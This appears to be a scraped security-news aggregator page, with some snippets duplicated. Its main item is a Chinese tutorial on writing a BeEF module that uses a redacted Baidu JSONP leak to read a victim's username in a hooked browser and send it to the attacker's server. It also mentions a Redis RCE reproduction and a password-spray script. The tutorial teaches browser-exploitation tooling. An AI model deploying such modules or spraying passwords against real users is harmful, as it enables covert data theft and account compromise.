Aggregator

上周有媒体报道McAfee计划重新IPO，笔者听到这个消息虽有点感触，却无一点意外，两年前TPG和Thoma

上周有媒体报道McAfee计划重新IPO，笔者听到这个消息虽有点感触，却无一点意外，两年前TPG和Thoma

上周有媒体报道McAfee计划重新IPO，笔者听到这个消息虽有点感触，却无一点意外，两年前TPG和Thoma

0x00 前言         之前在█度上瞎逛的时候开着代理，顺手就找到了█度一个JSONP泄漏漏洞，能够泄漏完整用户名。         不得不说█度的安全真的烂，人家█讯跟它一个年代的，老代码照样很多，但我之前尝试了谷歌上能找到的大部分页面，各种老系统边缘业务都试过了，就只找到一个能泄漏QQ名的漏洞，而█度随便逛逛就能撞到漏洞。建议█度安全部的人自己给自己泼█宝矿泉水自裁谢罪         （本文不会贴出具体的漏洞，如果只是想看█度漏洞的可以退了）         很快，我就构建了个POC能够alert出用户名。我就开始疯狂YY能不能做一个取证溯源系统，挂一个JS就能查到各种信息。         但是我突然隐约记起来，好像有个叫做BEEF的框架已经能将各种欺负浏览器的技巧集成在它的框架里面了，仔细一看这玩意着实厉害，凭我个人无限趋近于零的水平不可能做出更好的来。所以本着不能打败敌人那就加入敌人的无耻精神，我打开BEEF开始研究如何自己写一个BEEF的插件将这个漏洞整合进去 0x01 BEEF插件编写         BEEF官方在他们的gayhub页面上给出了开发模块的方法，不过就只有这一页很多东西根本就没有讲清楚，而且用的还是本人不熟悉的ruby，在编写的时候踩了不少坑         先说下BEEF插件长啥样         BEEF的插件存在/usr/share/beef-xss/modules/exploits/baidu_account/下面的文件夹里面，每个文件夹代表了一个"category"，即不同类别的模块，比如社会工程，持久化，漏洞利用，网络拓扑信息搜集之类的。说实在的，这让我联想到了MSF，同样是ruby写的，同样喜欢用文件夹把不同的模块区别开来（还有同样语焉不详的奇妙文档）。         但是不同之处在于，BEEF的每个模块又得装在这个category的子文件夹里面，比如我今天要编写的模块名字叫做baidu_account，归类在Exploits里面。那这个模块的目录就得是/usr/share/beef-xss/modules/exploits/baidu_account/。为什么是目录呢？读者可能已经猜到了，BEEF的每个模块需要多个文件。         一个标准的BEEF模块由三个文件组成

• config.yaml : 用于描述该模块相关信息的YAML文件
• module.rb :个人理解是我们控制端的“后端”文件，用于
• command.js :发给受害者执行的payload 

        首先需要编写config.yaml来定义模块的相关信息，包括它属于哪个category，它的名字，适用于哪些浏览器以及作者信息之类的。我就直接贴上我照猫画虎的文件
beef: module: baidu_account: enable: true category: "Exploits" name: "get Baidu account" description: "通过JSONP漏洞获取█度帐号名" authors: ["APU"] target: working: ["ALL"] 开头的beef:和module:是起手式，大部分模块的开头都是这个，这个意思是定义一个模块。西面这个需要和你模块的文件夹名字相同不然会出现莫名其妙的错误。enable定义这个模块是否被启用，我们当然选择true。category选择Exploits,在这里需要注意，category不能乱写，不能自己新建一个文件夹尝试新建一个category否则运行会失败或者无法添加模块，如果有人直到怎么新建category请告诉我。name就是模块的名字，description就是描述，authors是作者，这里是一个list(不是很熟悉ruby,不知道术语说对了没)应该是允许一个模块对应多个作者的，target是对应的浏览器，target的格式可以在刚才的链接里面看到我就不详细讲了
        写完这个文件之后就要写module.rb了，我再贴上代码来
class Baidu_account < BeEF::Core::Command # This method will be called when BeEF will receive an answer from the hooked browser def post_execute content = {} content['Baidu_account'] = @datastore['Baidu_account'] save content end end         在这里我们需要定义一个类，用于后端的处理。类中可以定义三个函数，self.options,pre_send,post_execute。即参数，发送前的准备，发送后的准备。类名虽然没有具体规范，但是我看到的插件都是把文件夹名字大写作为类名。由于我这里jsonp漏洞利用主要是需要在利用之后接收参数，所以只定义post_execute。
        对于BEEF,想要接收受害者上传的参数应该使用@datastore，这个@datastore储存了受害机发上来的数据，至于是怎么发的我们先不用关心，只需要知道它能从这里面取参数就可以了。取到了参数我们还需要储存，因此我们需要使用save 来储存参数。我代码中储存数据的语句是save content。这个content是之前定义的一个字典，用于接收上传的参数的
        最后我们需要做的就是写我们的核心command.js了，我这里把打了码的command.js发上来
function getbaiduaccount(data) { username=data['username']; beef.net.send("<%= @command_url %>", <%= @command_id %>, "Baidu_account="+username); } beef.execute(function() { beef.dom.loadScript("█度神秘JSONP接口"); });         BEEF官方声称我们必须把payload放在beef.execute函数内来执行，但是我在这个函数之外定义callback函数也是ok的。BEEF官方提供了许多函数来支持我们的各种操作，唯一的问题就是他们的迫真文档只列出了名字，功能我们得自己猜。不过我这里蛮幸运的，用Chrome的调试一找就找到了这里的loadScript函数，这样就能用这个函数加载JSONP的接口。在callback函数中，我们需要把辛辛苦苦拿到的数据传回去，这里就要用到beef.net.send函数了
        这个函数是这么调用的beef.net.send("<%= @command_url %>", <%= @command_id %>, "data");其中data就是我们要传回去的东西，其中data是个字符串，传输的数据格式跟平时URL传参没啥区别，就是“参数名1=值1&参数名2=值2....”
        最后要说的坑就是首先每次打开BEEF的时候BEEF应该已经加载完了插件，你再修改也不会变除非重启BEEF。这个困扰了我很久，之前我一直调试不对，后来才发现其实不重启程序根本没有变化。还有就是之前我模块命名不规范，瞎搞了一会删掉之后WEB端还显示那个模块，那是因为/usr/share/beef-xss/db/beef.db有缓存，需要删掉才能刷新
0x02 展示图片

0x03最后再指点江山几句         最近发现一大堆人都喜欢造什么漏洞利用框架，每个界面都花里胡哨的，仔细一看无非就是调用python脚本去扫描别人统一管理，实际上并不实用。本人以为成功的漏洞利用框架首先是得研究的早，比如metasploit就抢占了先机，算是最先搞漏洞利用框架的几个，现在就发展的很好。还有就是框架之所以叫做框架除了暗示这些利用能被统一管理之外，还需要能够给模块编写者提供一些支持，帮助模块开发者完成一些重复琐碎的事项，减少模块编写者的工作量，不然只能算个漏洞利用集合不算优秀的框架。那些优秀的框架，比如metasploit的shellcode统一管理就很好，从此写二进制EXP的人就能减少很多编shellcode的工作量，进而把核心放在漏洞上。再比如今天看见的BEEF框架就能够很轻松地解决数据回传问题，不需要像https://lcx.cc/post/4595/里面从头开始写个专门收数据的后端。希望这个也能给想要编写XX框架的人一些思考

brief desc

这里提供官方的题目 https://github.com/paul-axe/ctf

今年 WCTF 还是被按在地上摩擦，就 pdoor 这个题目来说，感觉是相当值得多思考几遍

F5 Labs' Preston Hogue writes for SecurityWeek, explaining how you as a security professional are a source of friction - and therefore risk - and what to do about it.

对Redis的RCE进行的一次详细的复现流程

Additional research and information provided by Asaf Nadler Recent changes to the Pykspa v2 domain generation algorithm (DGA) have made it more selective. Akamai researchers have tracked these changes and believe that part of the reason for selective domain generation...

情况: 在maven中引入两个包都有项目的包名和类名，只是jar包的名字不同。两个包的一部分在代码中的不同地方都需要用到。 网上找的大部分都是: 只有改变编译器优先选择的jar顺序（这个顺序是可以改变的）：包jdk放到前面就好了。 解决: 在maven中也是这样，只要调整好dependency的顺序

Understanding the significance of the three foundational information security principles: confidentiality, integrity, and availability.

Understanding the significance of the three foundational information security principles: confidentiality, integrity, and availability.

Learn the difference between VMware’s segmentation offerings, NSX-T vs NSX-V, and understand the several potential pitfalls that are important to consider before deployment.

严格来说，这其实是Symantec的第二次被并购。大马华裔陈福阳带领的Broadcom传出150亿美元价格并

严格来说，这其实是Symantec的第二次被并购。大马华裔陈福阳带领的Broadcom传出150亿美元价格并

严格来说，这其实是Symantec的第二次被并购。大马华裔陈福阳带领的Broadcom传出150亿美元价格并

关于成电的季节里，我最喜欢的便是夏天。那是我初入校

关于成电的季节里，我最喜欢的便是夏天。那是我初入校

换了一个apk实验后 apktool b -f -p. xxx也不行，仍然报资源错误 看了一下可能是鹅厂出的AndResGuard工具，会将资源文件夹/Res/xxx重命名为/r/x类的目录，导致资源解析出错 针对这个混淆有shakaApktool来对抗，但由于太久没有更新所以已经失修了 于是无奈回归apktool -r不解析资源文件、原样打包的思路 对于AndroidManifest.xml的二...

Charles的Map功能可以将某个请求进行重定向，用重定向的内容响应请求的内容。这个功能非常方便。在抓包过程当中，有时候为了调试方便，需要将线上的服务定位到内网。比如我们线上的服务器域名为 api.example.com，而内网的用于调试的服务器域名为 test.neiwang.com，那么就需要

One thing every red team should attempt early on and regularly is to perform some password spray testing across their organization to identify and help remediate usage of weak passwords.

In the past I have done this on Windows a lot, but now I built a simple version for it for Bash to run it also from a Mac.

Check it out: Bash Spray

Ideally, a script like bashspray.sh is integrated into your response pipelines, and SOC, Blue Team as well as account owner get notified - so they change their password right away, and any SOC investigation can be performed if necessary.